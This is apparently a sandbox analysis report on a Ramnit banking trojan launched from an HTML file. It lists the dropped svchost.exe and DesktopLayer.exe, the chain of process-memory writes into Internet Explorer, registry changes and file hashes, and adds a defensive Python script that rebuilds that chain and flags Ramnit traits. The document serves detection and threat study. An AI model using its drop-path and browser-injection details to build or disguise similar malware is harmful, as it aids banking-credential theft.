Malware Analysis Report

2025-01-19 07:17

Sample ID 240531-fhfd6agf89
Target 8605e735f755b19186b654efc2857890_JaffaCakes118
SHA256 1d69bcbc72a131a4d03aedb66bfc6a0e0f6dbfc97e46f675f12b606cf17a1ed1
Tags
ramnit banker spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1d69bcbc72a131a4d03aedb66bfc6a0e0f6dbfc97e46f675f12b606cf17a1ed1

Threat Level: Known bad

The file 8605e735f755b19186b654efc2857890_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

ramnit banker spyware stealer trojan upx worm

Ramnit

UPX packed file

Loads dropped DLL

Executes dropped EXE

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 04:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 04:52

Reported

2024-05-31 04:54

Platform

win7-20240508-en

Max time kernel

121s

Max time network

131s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

Signatures

Ramnit

trojan spyware stealer worm banker ramnit

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
(3 matches; no indicator, process or target recorded for any of them)

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft\px229E.tmp C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value omitted] C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406fea6016b3da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423293000" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a23000000000200000000001066000000010000200000009faf928a2475db129d7d6c883bc706e59add0115455d6be6f395969f13dd6a19000000000e8000000002000020000000f3f3c07c50efed74c222020f56c47ff0e886079dd5a5e95d31441fd9aa6cdaaa20000000b95ba2006387bafb1779ba6d90c737e70e96ce7b50cd5c461aec17fb41e07322400000002fd69e80865e0c2d41b180552fa9c95aa0e6946ae54eea28ed021f13373a701763b80668b52613e638c2a69d1dd2bc7635a57ded2fe7f643f9dcd5619f10f5c4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8BE685D1-1F09-11EF-931A-4205ACB4EED4} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 328 wrote to memory of 1908 (4 writes) N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1908 wrote to memory of 2724 (4 writes) N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2724 wrote to memory of 2660 (4 writes) N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe
PID 2660 wrote to memory of 2520 (4 writes) N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 328 wrote to memory of 2548 (4 writes) N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:328 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:328 CREDAT:209933 /prefetch:2
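Read together, the WriteProcessMemory table and the Processes list above give the infection chain of the Win7 run: the HTML file is opened in the IE frame process (PID 328), which spawns a tab (1908); the tab writes into the dropped %TEMP%\svchost.exe (2724); svchost.exe drops and starts C:\Program Files (x86)\Microsoft\DesktopLayer.exe (2660); DesktopLayer.exe starts a fresh iexplore.exe (2520) and writes into it, which is where Ramnit's browser hooking happens. The 328 -> 1908 and 328 -> 2548 writes are ordinary IE frame-to-tab spawning and should not be treated as findings. The script below is an added example, not part of the sandbox report or of any vendor's tooling: it parses the report's own event rows (copied in as constructed input) into that chain and applies three analyst heuristics, namely svchost.exe running outside System32/SysWOW64, the DesktopLayer.exe drop path Ramnit is known for, and a dropped binary writing into a browser process. The tag names and rules are my own choices, not the sandbox's signatures.

```python
"""Rebuild the behavioral1 injection chain from the sandbox event lines and
flag the parts of it that are characteristic of Ramnit.

Added example; not part of the sandbox report. Input is constructed by
copying the report's WriteProcessMemory rows. The tags and rules are the
author's own heuristics, not the sandbox's signatures.
"""
import re
from collections import defaultdict

# Constructed input: the five distinct rows of the WriteProcessMemory table.
WPM_EVENTS = r"""
PID 328 wrote to memory of 1908 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1908 wrote to memory of 2724 N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2724 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe
PID 2660 wrote to memory of 2520 N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 328 wrote to memory of 2548 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"""

# "PID <src> wrote to memory of <dst> N/A <src path> <dst path>"; the paths
# contain spaces but both end in .exe, so a lazy match on the first is enough.
EVENT_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+\.exe)$", re.I)

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
# Well-known Ramnit drop location (matches the "Drops file in Program Files" rows).
RAMNIT_DROP = "\\program files (x86)\\microsoft\\desktoplayer.exe"


def parse_wpm_events(text):
    """Return distinct (src_pid, src_path, dst_pid, dst_path) tuples.

    The sandbox logs every individual write; identical rows collapse to one
    edge because only the relationship matters here.
    """
    seen, events = set(), []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = (int(m.group(1)), m.group(3), int(m.group(2)), m.group(4))
        if ev not in seen:
            seen.add(ev)
            events.append(ev)
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(path):
    """Per-image tags; an empty set means nothing suspicious about the path."""
    low, tags = path.lower(), set()
    if basename(path) == "svchost.exe" and not low.startswith(SYSTEM_DIRS):
        tags.add("svchost_outside_system32")
    if low.endswith(RAMNIT_DROP):
        tags.add("ramnit_desktoplayer_drop")
    if "\\appdata\\local\\temp\\" in low and low.endswith(".exe"):
        tags.add("exe_in_user_temp")
    return tags


def analyse(events):
    """Return [(src_pid, dst_pid, [tags])] for every write worth a look.

    A browser writing into another browser process (IE frame -> tab) is
    normal and produces no finding.
    """
    findings = []
    for src_pid, src, dst_pid, dst in events:
        tags = classify(src) | classify(dst)
        src_is_browser, dst_is_browser = basename(src) in BROWSERS, basename(dst) in BROWSERS
        if src_is_browser and "exe_in_user_temp" in classify(dst):
            tags.add("browser_spawned_temp_exe")
        if not src_is_browser and dst_is_browser and classify(src):
            tags.add("dropped_binary_writes_into_browser")  # Ramnit's hooking step
        if tags:
            findings.append((src_pid, dst_pid, sorted(tags)))
    return findings


def longest_chain(events):
    """Follow writer -> target edges from the root and return the longest PID path."""
    children = defaultdict(list)
    for s, _, d, _ in events:
        children[s].append(d)
    roots = {s for s, _, _, _ in events} - {d for _, _, d, _ in events}

    def walk(pid, seen):
        best = [pid]
        for child in children.get(pid, []):
            if child in seen:
                continue  # guard against cycles in malformed input
            cand = [pid] + walk(child, seen | {pid})
            if len(cand) > len(best):
                best = cand
        return best

    return max((walk(r, set()) for r in roots), key=len) if roots else []


if __name__ == "__main__":
    evs = parse_wpm_events(WPM_EVENTS)
    print("chain:", " -> ".join(map(str, longest_chain(evs))))
    for src, dst, tags in analyse(evs):
        print(f"{src} -> {dst}: {', '.join(tags)}")
```

Run against the rows above it prints the chain 328 -> 1908 -> 2724 -> 2660 -> 2520 and three findings (1908 -> 2724, 2724 -> 2660, 2660 -> 2520); the two frame-to-tab writes produce nothing. The same parser works on rows from other reports in this format, and the rules transfer to EDR telemetry once the event fields are mapped to (writer path, target path).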

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.bing.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 ff5e1f27193ce51eec318714ef038bef
SHA1 b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6
SHA256 fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320
SHA512 c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

memory/2724-9-0x0000000000230000-0x000000000023F000-memory.dmp

memory/2724-8-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2660-18-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2660-16-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3747.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Cab37CA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar37DC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80cf85fab356d5924eef59ab648adf99
SHA1 cfcde2e8741379d125f85620c5cc07f9cd568b2f
SHA256 21892fb61d99ab541bb2876452e69cb7db88a14871d5a0c32c33bbd8ecbf353a
SHA512 8e68a95fd683d3284349448c90d3d3bb1ffecff7ed5ebab863fac1462bb180e8879e4deed88e7a2701bd2ee85996f518860a9cf168b92e7ea73f775356387681

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 10921551ae8a7ddda979c137e755fb5e
SHA1 c570fb778422362966e6d63537c386569ea6d69f
SHA256 a4db6e8be03eda3c90b215a4eb14e56ddb7789de1d0984482b86717f35395193
SHA512 aff295edfb8449fa17274dfa856803a734d24b1b07246682d78b50e80239e48cf869ec336a316c0b53bd9e41b8476072cb4b7de265793f7a5025c8de1f2dbe2c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 22d0dccc69f0d14a07500050efa55ef2
SHA1 bcbb5cd56715e516bfc386f874c9080ad47d5897
SHA256 de5022009e55c1b80500859c88d489a6a3e24a8e56c0d481b7fdb523455d713f
SHA512 e67ef219f87970a2180cb055359a8d739edd1fa173bb2b0c1291210845925e39356c049136d74bf52d4a5d301ed2a5f51e8754608cf9591fbc98ba0c2cae5da0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 07b0a0a12e450074f0c805fdfc8628e6
SHA1 240474db5c2381524446e99bf45c06aa83b43ae9
SHA256 11f99a9da38e88f3f71268e4406fcfcc6a16ba387c317bf436fd9f85b98e7cdb
SHA512 5063ddf22ef933d0571c025f859c136b803cc4416e441a107ea3e439f7824c13ec084b0490aab6bd565bc2aa65c1f0d1980d9141b486c8eea29e2e9f4cbc763a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a007ab62554f5d52ec8190502f92a33a
SHA1 8f391774b1a449c21b01f1bd4458be2fec6c2369
SHA256 2187b8656f8667d5e55a6c9bacd25a6a957bda539cb04016d1ccd6dfb27aa485
SHA512 d9f92945479b5078e45cd2a2bcb8b9bfe0870beb88e0e2a6d920f429669c8d18932ef6db0c7f41309f18729598dc414ccc3c2a15cb2fc70dc46f53430d368b8c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d0cd7ded44985e9eb3bf6beeeb95a9be
SHA1 73d91e6cad69c4c0d4a7adfe3f17e313ad9c824b
SHA256 cf392cf390fc999ef69603d87fb6704db2e8067faaa7c5299d0a483c1d7d5bd8
SHA512 838309b18db92f4bb128b53d8b4fc8872a81edbf58b0dd0acc834f90325c9aaa5dea073143b651b9a13c4ab02b773c78d94576e5781687d09b258bfb50082205

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3794d0e58dcb49ea2ebc75bb1b832aa8
SHA1 19a47fc7418653591d7dc17a2135c33d626e3c45
SHA256 5073cbb495135a047e750b19b1b2b10303a3c7f118dc1f525f42513d8faeb877
SHA512 771284c6099d1d6f8ff53fda6e24c335d54b9376aae06d02b3b3f45a78da5fb8e3c8441c05888751dc61ea86780652c338b1430f5423449dd5b9a1a36f37c0b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ee043931b530250039f4ff14a766466
SHA1 e36e5dd19ed959c30c482bc24fc9a53800c68042
SHA256 3bbd74c866e5605513978aad93d10ded074dd3c6f4d6bbc026c4cbd02a59554b
SHA512 394a58f7e416bc5768397fb1da2fa29d3e6c5ac7cf59555eaffe7ca444f2e628abc18f7f0ebfe4b904c103c7494bd526b5cecd62d2719a60e9632227e33d4cd1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c1dca4bfa2174024d5bd4796fb62b6c5
SHA1 9deccd55a8f66413f789f9e8306b374e5d9f9597
SHA256 0c931d867570be93f5d1976b14c333311b2b14f37d8a4e5191a6187f2053c943
SHA512 bd56a279393959dc611fabf3e1ea32e74859cb8337e21067f0d9df5fe882955ef2294ea23bf971f013bf9e96a5aa841afa8da865a7d4ca6da04a6b770f0bc2be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 84c4ebc704a3aecfdd2681e40c69771b
SHA1 38a36f0a2fa823732cc3f8fe1226cc09efa1a2c0
SHA256 5ffe3fc45fcd1fbc55981982759370f0b1e63e2dfb9906d7f5ed421ecc295010
SHA512 97ad84f3f041f0cd5d95d11da7b0362f8b19cd2edca4e4db11da985ee784260dfc01046d3dc5c5efadc936184326bdbe1d684369ff3ac4942d6a833403a5f6d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2a77ec288649d2fc5bce1c80ffc6a44
SHA1 e014d37f180d8a8cbfd5db30b205acba828f94fe
SHA256 0f360fbfcaa17b9397f380e1ca7aef48c2ad5ed5050078c721bf9ea99e827ac3
SHA512 d82281b07d0d894a3b0ace21673b1481d479d5f7789ae6f1eea71b7d66e9338e8c1fdee93cc2437b17362423a80cb023d836efc7140c7d44694bbe3e63b85bd5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2dafd0aa6aa3cf2e4f3caca66471fd30
SHA1 b78e29dabe713d2483f91f49631a24bf086ef8c4
SHA256 cbcb8d50afb0699aeb656ec63c12b108e3725f84eef781490591c6bd9b14ed94
SHA512 68fa912ff72fffd9796ce6e4a54b108446c5eab4e99295ebd8362e09bdf3b4e602853091cb2de39cdb2c7a21dd81dbd620476fa11105ab1a0394e9c986e1cfd0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8b5af42895c74545c218c60c808ee669
SHA1 65168951d9393cb19905ed2432af301df8bac6f9
SHA256 d350b764a36172919570e95afc0d9873b24aee9afc70d9b96eb3091644fd63b0
SHA512 4c96c799ee44cca9dbb65f6922b7df7bf9fcde14789a85a387e3eb23e2b1ca44ebdda767775bf649bf3e86638e96c5555eee564cdbe9dbc30d6d1d59d533c59a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 69d4585c8e75b14bee77472e025d6d3b
SHA1 79128b6b68fde9a05d5b9a800a1c28d45b439bdc
SHA256 55390159922faec91d83d8ad7c574d11e3542deec3b5086ec1ed0e7623c74c69
SHA512 e706079f66a54434fde42c6027d8eb83f2c9c9f9050ac72de3de67fc36043806cb9405c0625fd9c2c7c5848b46cb704c444ef26b1e21b53f09802d8d25200307

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 183e0be3776536c0892da5a6cd7588ca
SHA1 99183db35f2a56734f9908b4e435798d9d31df77
SHA256 1ac4b15507b2fecb532d5292413bfb740c51abd5ffd607fa05dbfe7cb2886862
SHA512 f061b9c0d9222cf1502ca748a098b563945a4ee034628028113e650ddabfde3e773e08b7880a81221502aa48f81a49c85d3c987bea2eed30a7cffb85699becc0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bcaa0aa2a5208cd4c6ec40edd195b16c
SHA1 f56179b5dd6cd3c0aa84d23228cb1268bd24742c
SHA256 57bb0d863d8c178c80faa81405648201cbf68ac1b83e487b7c1ebff389921177
SHA512 e84aefd6a0d32dc7a8cb17f7cd236de342610398cb6571310ad17bc2357b3ac034f91714057366e4dda750a6a96c3696c36b77efd77a6a16a80d6f2d86b0a846

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f7cb36460ab0e1e0766334d217e56913
SHA1 da419ded8ace4c4d971fda605c1f97cb71a462d3
SHA256 64e70229ac4f1ef6b7c3e32e799bbc6f9bf717e42fd872a04a797c1b4e26b61b
SHA512 9252c8d4e7b40fb94cc2bb2294882e1f2f6b33b2de91b1349aa34625eebb8bc8729e69993e79b0f3cacfd7a9f01227b9a689fa691c342d8bdd3fc09dd550db26

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7db53b8abe1157b08f1c249e80b354cd
SHA1 a542cb32b2ca1786d12299b836124588afba6e1c
SHA256 8bbb4d14531e7fd08bbd0050b28e1c2eb1c755b2b6227c00dbac2c42f029f357
SHA512 7e0178ffb1b5197fb02f15d00229129a069f8ef4f9c3628c7a405738038fa63d8949aaca1857cbe6573e7e648b9c60ab1b81773cfc15d34a0f982152f2c08e61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ec2001e2631209fd0af4464b6cf41ad8
SHA1 f25f3b444dbd32ed209ae4bd7c61b4deadee44dc
SHA256 8b5854d115932e67facb46a033ec8982e7583b369f2feb7161fa67d846357610
SHA512 84343c4defb85e43f133c3f4fed46a06e9f9ce4c717e318e7506dd625542671a1c5cc8fdae26acdf163203d4bcc512c4f82256d7b7dc815fc3b8674b6ace4397

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

